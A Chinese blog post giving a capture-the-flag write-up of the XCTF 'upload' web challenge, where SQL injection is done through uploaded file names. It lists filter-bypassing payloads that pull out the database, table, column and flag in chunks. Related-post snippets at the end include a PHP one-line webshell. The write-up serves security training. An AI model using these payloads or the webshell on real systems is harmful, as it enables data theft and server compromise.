攻防世界web进阶区upload详解

最新推荐文章于 2025-02-07 05:27:47 发布
最新推荐文章于 2025-02-07 05:27:47 发布
阅读量2.3k 收藏 8
点赞数 5
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hxhxhxhxx/article/details/107978930
版权

攻防世界web进阶区upload详解

题目

在这里插入图片描述
进入页面是我们的注册
登录以后,发现可以文件上传

在这里插入图片描述
在这里插入图片描述
传完之后发现有回显,猜测可能是文件名注入
我们先进行一系列得上传测试,发现都不行
在这里插入图片描述

这时候,御剑发来了好消息,
这儿有一个include,classes的文件

在这里插入图片描述

我们使用burp康康有哪些过滤
在这里插入图片描述
在这里插入图片描述
发现被制为了空,我们猜一猜是双写绕过

下面解除文件名字注入

1.把文件名改成 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg
① 这里使用substr的原因是当数字过长的时候会变成科学计数法,所以需要分批次来获取内容
②使用CONV是因为题目过滤了回显有字母的情况,如果出现了字母则后面的内容就不显示,所以需要将16进制的内容转成10进制
或者我们可以使用两次hex绕过也可以

这时候返回了我们的值
在这里插入图片描述

我们先16进制转换为10进制,然后再转回去
在这里插入图片描述

数据库叫web_up

很明显有点少,我们把范围往后扩大一下
a' +(selselectect conv(substr(hex(database()),12,15),16,10))+ '.jpg
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
2- 然后我们查询表名

a'+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom information_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit 1,1)),1,12),16,10))+'.jpg
a'+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom information_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit 1,1)),13,12),16,10))+'.jpg
a'+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom information_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit 1,1)),25,12),16,10))+'.jpg
十进制:
114784820031327
112615676665705
126853610566245
在这里插入图片描述
字符拼接完成
如下转自
https://blog.youkuaiyun.com/Sacrifice_li/article/details/106714709

3.然后是列名:(i_am_flag)

①s ‘+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = ‘hello_flag_is_here’ limit 0,1)),1,12),16,10))+’.jpg------------->结果为 i_am_f

②s ‘+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = ‘hello_flag_is_here’ limit 0,1)),13,12),16,10))+’.jpg----------->结果为 lag

4.字段内容:(!!_@m_Th.e_F!lag)

①s ‘+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),1,12),16,10))+’.jpg
------->结果为: !!@m

②s ‘+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10))+’.jpg
------->结果为: Th.e_F

③s ‘+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),25,12),16,10))+’.jpg
------->结果为: !lag

②CONV(N,from_base,to_base)

函数,是指将N以from_base为底的基数,转成to_base的数,例如CONV(5,10,2),意思就是把10进制的5转成2进制

③substr(string,start,length)

—>string指的是字符串,start是从什么位置开始,length是长度,返回内容为截取的字符串

在本题中,由于内容太长而导致会变成科学计数法,所以需要用截取,同时配合CONV来使用以至于不会被回显拦截。

[网络安全自学篇] 九十三.《Windows黑客编程技术详解》之木马开机自启动技术(注册表、计划任务、系统服务)
杨秀璋的专栏
08-15 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第四篇文章主要介绍木马病毒自启动技术,包括注册表、快速启动目录、计划任务和系统服务,希望对您有所帮助。
攻防世界-upload
qq_44065556的博客
09-24 1261
进入场景映入眼帘 需要注册账号 注册好之后,登录跳转页面 突破点应该就在这里了 我们先上传一个php文件 显示不正确的文件扩展名,被拦了 用burp抓包改信息 成功上传 但是没有上传路径 只能上传不能利用 思考(题目给的是upload,给的引导思路 就是上传文件拿flag) 我试着上传jpg,png格式的图片文件 有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...
攻防世界web进阶upload
gongjingege的博客
08-15 542
这道题头都被打烂了。。。 题目为upload,第一反应文件上传,一句话菜刀就行了,结果,结果是注入。。。 (思维还是不灵活,脑洞还是不够大) 打开题目,先注册,这里没有注入 登录然后进入上传界面 写个一句话木马,上传 试了好几个,php,txt,都是文件扩展不对,只有jpg可以,应该是白名单过滤 同时界面将文件名回显 推测,将文件存入了数据库,显示文件名,当你输入查询数据库的语句时,是不是可以读取数据库 那么,结合大佬的wp,将文件名构造成sql查询语句(这个思路骚气。。。) 试着构造的时候,发现sel
攻防世界 文件上传
2403_87533599的博客
02-07 974
今天的题大概提一下解题思路就好了这里要使用php://filter 在此基础上因为网页过滤了一些关键字 我们要进行爆破就得到了cyberpeace{d85dfd5b23264ede9fc8e1f9bc93a382}
攻防世界-web-upload
wuh2333的博客
12-13 1530
攻防世界webupload,sql注入
攻防世界upload
qq_51744055的博客
05-03 744
Hex()是MySQL的Sring函数。 此方法返回给定数字或字符串的十六进制字符串 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg 数据库名变成16进制 选取从第一个字母开始,往后数12个字母 hex 16进制再16进制 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制 substr(str,start,length):将str从st
攻防世界upload1
金 帛的博客
04-24 2410
攻防世界之文件上传
攻防世界-web-upload1
wuh2333的博客
05-21 385
攻防世界upload1
攻防世界upload1(web
yuanxu8877的博客
11-22 1286
攻防世界web-upload1
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1484
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
攻防世界Web赛题记录
Bit0
10-13 2741
Cat 题目:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4658&page=2 Writeup: 攻防世界-web-Cat(XCTF 4th-WHCTF-2017)_Sea_Sand息禅-优快云博客 攻防世界 | CAT - laolao - 博客园 [CTF题目总结-web篇]攻防世界:Cat_T2hunz1-优快云博客 知识点: 1.输入字符 get传递在网址
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8445
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
web安全攻防渗透+赵雨佳43
ABCD_6的博客
04-07 4985
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 2.3 搭建DVWA漏洞环境 DVWA是一款开源的渗透测试漏洞练习平台,其中内涵XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境。 2.4 搭建SQL注入平台 sqli-labs是一款学习SQL注入的开源平台,共有75种不同类型的注入,在本书的同步网站下载完压缩包后并解压,复..
攻防世界web进阶upload1
0pt1mus
03-13 907
转自个人博客0pt1mus 打开网站,可以发现只存在一个选择文件框和一个上传按钮。 我们可以考虑直接上传一个一句话木马尝试。 <?php @eval($_POST['shell']);?> 快速弹出警告框,让上传图片文件。猜测是前端js判断。 F12打开控制台,成功发现js代码,右击直接删掉。 重新选择一句话木马,此时发现上传按钮无法点击,在F12的console中将按钮的di...
攻防世界upload1
bjml_的博客
11-06 1143
攻防世界upload1
攻防世界-高手进阶upload
Sacrifice_li的博客
06-12 708
进来页面如下: 然后就是正常的去注册一个用户,并且登录,我在这里也做了拦截,但是并没有什么有价值的信息: 登录进来之后是这样的一个页面,是文件上传(不过根据题目意思也是肯定可以知道的)。 我在这边也做了测试,只能够上传jpg文件,想要尝试php4,php5,php文件后缀都是不可以的。 然后我就在考虑是否是文件后缀截断上传,但是抓包截取内容之后并没有返回文件上传到哪里了,同时nikto和dirb扫描也没有发现什么有价值的信息。 接下来的话,就是看别人的wp了。不过说真的,第一次接触到.
file upload 攻防世界_攻防世界 upload
weixin_36443680的博客
02-23 298
攻防世界上的一道web题为什么我觉得完全不像萌新入坑的题呢 退坑还差不多吧一看名字以及页面想当然的就是文件上传了呗 结果各种尝试,也没什么办法,但是每次我们上传后会有文件名的回显 但是正常的文件上传也都有这种名字的回显,可能不太寻常的就是这个没有路径吧最后看的writeup 说是sql注入????不明白怎么能看出来是注入的图片文件名存在注入,并且过滤了select from 用双写就能绕过p...
攻防世界XCTF:upload
末初 - mochu7
03-08 950
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
【愚公系列】2023年06月 攻防世界-Webupload
时光隧道
06-20 6949
SQL注入的16进制绕过是指攻击者使用16进制编码绕过输入过滤和防御措施,从而执行恶意的SQL语句。例如,当输入过滤器检测到单引号时,它可能会将其替换为两个单引号,以避免SQL注入攻击。然而,攻击者可以使用16进制编码来绕过这一过滤器。这里的0x27是单引号的16进制编码,而0x2720656e7472616e63652070617373776f7264是" 'entrance password "的16进制编码,用来代替密码字段。攻击者可以使用类似的技术来绕过其他类型的输入过滤器和防御措施。
攻防世界webupload1
最新发布
03-21
嗯,用户需要关于攻防世界Web部分的Upload1挑战的解题思路或writeup。首先,我应该回忆一下常见的Upload类题目的常见漏洞点,比如文件上传绕过、黑名单过滤、MIME类型检查、.htaccess利用、内容检测绕过等。 根据...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值